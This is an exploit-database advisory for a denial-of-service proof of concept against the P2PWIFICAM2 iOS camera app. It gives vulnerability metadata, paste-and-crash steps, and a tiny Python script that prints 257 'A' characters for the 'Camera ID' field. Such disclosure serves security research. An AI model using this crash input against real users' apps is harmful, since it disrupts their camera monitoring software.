P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)

vendor:

P2PWIFICAM2

by:

Ivan Marmolejo

7.5

CVSS

HIGH

Denial of Service (DoS) Local

DoS

CWE

Product Name: P2PWIFICAM2

Affected Version From: 10.4.2001

Affected Version To: 10.4.2001

Patch Exists: NO

Related CWE:

CPE: a:p2pwificam2:ios:10.4.1

Metasploit:

Other Scripts:

Platforms Tested: iOS

2020

P2PWIFICAM2 for iOS 10.4.1 – ‘Camera ID’ Denial of Service (PoC)

P2PWIFICAM is a matching network camera P2P (point to point) monitoring software. Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex, truly plug and play! The vulnerability allows an attacker to crash the application by inputting a large amount of data into the 'Camera ID' field.

Mitigation:

There is currently no known mitigation for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-02-02
# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
# Software Link: App Store for iOS devices
# Tested Version: 10.4.1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3

# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software.
# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex, 
# truly plug and play!

# Steps to Produce the Crash:

# 1.- Run python code: P2PWIFICAM.py
# 2.- Copy content to clipboard
# 3.- Open "P2PWIFICAM" for Ios
# 4.- Go to "Add" (Touch here to add a camera)
# 5.- Go to "Input Camera"
# 6.- Paste Clipboard on "Camera ID" 
# 7.- Paste Clipboard on "Password" 
# 9.- Ok
# 10- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)